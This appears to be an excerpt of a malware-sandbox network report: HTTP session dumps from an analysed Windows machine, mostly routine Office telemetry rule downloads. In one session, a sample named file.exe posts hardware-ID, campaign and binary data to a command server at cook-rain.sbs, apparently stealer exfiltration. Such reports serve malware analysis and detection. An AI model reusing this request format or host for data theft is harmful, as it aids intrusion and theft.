                                                                                                                                                                              2024-11-21 07:30:19 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 64 69 7a 32 34 33 5a 6d 2f 30 47 6d 38 4d 36 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 61 37 65 36 62 39 66 33 33 62 31 32 32 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69
                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: diz243Zm/0Gm8M6t.2Context: d1a7e6b9f33b1227<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
                                                                                                                                                                              2024-11-21 07:30:19 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 64 69 7a 32 34 33 5a 6d 2f 30 47 6d 38 4d 36 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 61 37 65 36 62 39 66 33 33 62 31 32 32 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: diz243Zm/0Gm8M6t.3Context: d1a7e6b9f33b1227<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                              2024-11-21 07:30:19 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                              2024-11-21 07:30:19 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 31 43 49 2b 56 48 44 73 30 79 4a 45 6c 6f 72 74 55 50 4e 66 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                              Data Ascii: MS-CV: c1CI+VHDs0yJElortUPNfQ.0Payload parsing failed.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              12192.168.2.64972313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:21 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:21 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                              x-ms-request-id: 17c3c293-501e-00a3-6567-3bc0f2000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073021Z-178bfbc474bwlrhlhC1NYCy3kg000000017g00000000209h
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              13192.168.2.64972213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:21 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:21 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                              x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073021Z-1777c6cb754xjpthhC1TEBexs80000000am000000000apq0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              14192.168.2.64972413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:21 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:21 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                              x-ms-request-id: b54876a2-a01e-0070-6764-3b573b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073021Z-178bfbc474bbcwv4hC1NYCypys000000011g000000004rdq
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.649726188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:21 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=SXJB38SWO2JII
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 19939
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:21 UTC15331OUTData Raw: 2d 2d 53 58 4a 42 33 38 53 57 4f 32 4a 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 37 32 30 44 35 36 34 45 34 46 30 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 53 58 4a 42 33 38 53 57 4f 32 4a 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 58 4a 42 33 38 53 57 4f 32 4a 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 53 58 4a 42 33
                                                                                                                                                                              Data Ascii: --SXJB38SWO2JIIContent-Disposition: form-data; name="hwid"493720D564E4F0CB63CFCF7E6C45F838--SXJB38SWO2JIIContent-Disposition: form-data; name="pid"3--SXJB38SWO2JIIContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--SXJB3
                                                                                                                                                                              2024-11-21 07:30:21 UTC4608OUTData Raw: 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                                                                                              2024-11-21 07:30:22 UTC979INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:21 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=5r9mh0dr4t3fa73tndib92thaf; expires=Mon, 17-Mar-2025 01:17:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bc7HDlOtntelmrJSzpKIzpvBqu2lev7%2BjwD9ZKlHsG6CHiMRsLALgfXkq5sjjAJFj8Sqxni4ilJKslwECx0ySI2qM5yyN8FGaoUymxiY6ikYZtnuA9rlDV25hVxRKJ8x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef953cca30f64-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1977&sent=9&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=20893&delivery_rate=1471774&cwnd=229&unsent_bytes=0&cid=90dbbacbd759f3aa&ts=944&x=0"
                                                                                                                                                                              2024-11-21 07:30:22 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                              2024-11-21 07:30:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              16192.168.2.64972113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:21 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:22 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                              x-ms-request-id: 3126d9de-f01e-0099-4d8c-3a9171000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073022Z-1777c6cb754rz2pghC1TEBghen0000000arg000000003xcd
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:22 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              17192.168.2.64972513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:21 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                              x-ms-request-id: 3af01634-701e-000d-3dd2-3b6de3000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073021Z-r1d97b99577jlrkbhC1TEBq8d000000009u000000000hcmf
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              18192.168.2.64972913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:23 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:23 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                              x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073023Z-178bfbc474b9fdhphC1NYCac0n000000012000000000941w
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              19192.168.2.64972713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:23 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:23 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                              x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073023Z-178bfbc474bmqmgjhC1NYCy16c000000016g000000008nsr
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
